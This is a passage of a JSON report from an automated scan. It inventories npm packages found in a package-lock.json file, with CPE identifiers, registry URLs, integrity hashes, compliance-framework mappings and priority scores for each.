"syft-generated" } ], "purl": "pkg:npm/is-binary-path@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", "dependencies": { "binary-extensions": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "3e8a78c5009c1819", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-core-module 2.16.1", "title": "is-core-module 2.16.1", "description": "Package discovered: is-core-module 2.16.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9f592f96ab7392ec", "name": "is-core-module", "version": "2.16.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-core-module:is-core-module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-core-module:is_core_module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_core_module:is-core-module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_core_module:is_core_module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-core:is-core-module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-core:is_core_module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_core:is-core-module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_core:is_core_module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-core-module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_core_module:2.16.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-core-module@2.16.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.16.1.tgz", "integrity": "sha512-UfoeMA6fIJ8wTYFEUjelnaGI67v6+N7qXJEvQuIGa99l4xsCruSYOVSQ0uPANn4dAzm8lkYPaKLrrijLq7x23w==", "dependencies": { "hasown": "^2.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "bb2d7c3406b84981", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-extglob 2.1.1", "title": "is-extglob 2.1.1", "description": "Package discovered: is-extglob 2.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b2879743f62f2c47", "name": "is-extglob", "version": "2.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-extglob:is-extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-extglob:is_extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_extglob:is-extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_extglob:is_extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_extglob:2.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-extglob@2.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "437e0c6e090c00f1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-fullwidth-code-point 3.0.0", "title": "is-fullwidth-code-point 3.0.0", "description": "Package discovered: is-fullwidth-code-point 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "8a7d27e13373f9f8", "name": "is-fullwidth-code-point", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-fullwidth-code-point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-fullwidth-code-point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth_code_point:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth_code_point:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-fullwidth-code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-fullwidth-code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth_code:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth_code:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_fullwidth:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-fullwidth-code-point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_fullwidth_code_point:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-fullwidth-code-point@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8b982d6ae21c367b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-glob 4.0.3", "title": "is-glob 4.0.3", "description": "Package discovered: is-glob 4.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6a2e0a343ed2b45b", "name": "is-glob", "version": "4.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-glob:is-glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-glob:is_glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_glob:is-glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_glob:is_glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_glob:4.0.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-glob@4.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", "dependencies": { "is-extglob": "^2.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f5c20bc28d065782", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-number 7.0.0", "title": "is-number 7.0.0", "description": "Package discovered: is-number 7.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "19d61645d0264090", "name": "is-number", "version": "7.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-number:is-number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-number:is_number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_number:is-number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_number:is_number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_number:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-number@7.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1ec1886de995b530", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-stream 2.0.1", "title": "is-stream 2.0.1", "description": "Package discovered: is-stream 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0d47a7f43264d12f", "name": "is-stream", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-stream:is-stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-stream:is_stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_stream:is-stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_stream:is_stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_stream:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-stream@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "cd8dbd159ce77812", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: is-url 1.2.4", "title": "is-url 1.2.4", "description": "Package discovered: is-url 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0055323086e6dbe0", "name": "is-url", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:is-url:is-url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is-url:is_url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_url:is-url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is_url:is_url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is-url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:is:is_url:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/is-url@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/is-url/-/is-url-1.2.4.tgz", "integrity": "sha512-ITvGim8FhRiYe4IQ5uHSkj7pVaPDrCTkNd3yq3cV7iZAcJdHTUMPMEHcqSOy9xZ9qFenQCvi+2wjH9a1nXqHww==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "25f78dcaa669e646", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: isarray 1.0.0", "title": "isarray 1.0.0", "description": "Package discovered: isarray 1.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "14ac0fadd6b69d11", "name": "isarray", "version": "1.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:isarray:isarray:1.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/isarray@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", 